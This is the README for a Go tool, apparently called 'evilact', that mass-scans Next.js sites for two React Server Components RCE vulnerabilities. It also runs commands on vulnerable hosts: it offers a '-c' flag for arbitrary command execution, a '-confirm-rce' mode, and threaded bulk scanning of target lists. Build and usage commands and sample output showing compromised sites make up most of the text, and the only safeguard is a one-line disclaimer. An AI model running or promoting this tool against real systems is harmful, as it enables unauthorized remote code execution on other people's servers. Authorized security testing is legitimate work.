
Next.js の RCE 脆弱性 (CVE-2025-55182 & CVE-2025-66478) を検出・確認するための高速スキャナ。
React Server Components を使用する Next.js アプリケーションにおける CVE-2025-55182 および CVE-2025-66478 向けの高速脆弱性スキャナーです。一括スキャン、RCE 確認、高パフォーマンスな並行チェックに対応しています。
git clone https://github.com/cypholab/evilact.git
cd evilact
go build -o scanner main.go
# Single URL
./scanner -url https://target.com
# Multiple URLs from file
./scanner -file targets.txt
# With RCE confirmation
./scanner -url https://target.com -confirm-rce
# Fast scan with 50 threads
./scanner -file targets.txt -threads 50
-url Single target URL
-file File with URLs (one per line)
-c Command to execute (default: id)
-threads Number of threads (default: 10)
-confirm-rce Confirm RCE execution
-check-only Safe check mode
-v Verbose output
-t Timeout in seconds (default: 10)
./scanner -file targets.txt -threads 20 -confirm-rce
[SCANNER] Loaded 100 URLs
[SCANNER] [VULNERABLE + RCE CONFIRMED] https://site1.com - Status: 303 (0.18s)
[SCANNER] [NOT VULNERABLE] https://site2.com - Status: 200 (0.15s)
Scanned 100 targets: 5 vulnerable, 5 RCE confirmed, 95 secure, 0 errors
Vulnerable targets:
- https://site1.com [RCE CONFIRMED]
- https://site3.com [RCE CONFIRMED]
認可されたテスト専用です。不正な使用は禁止されています。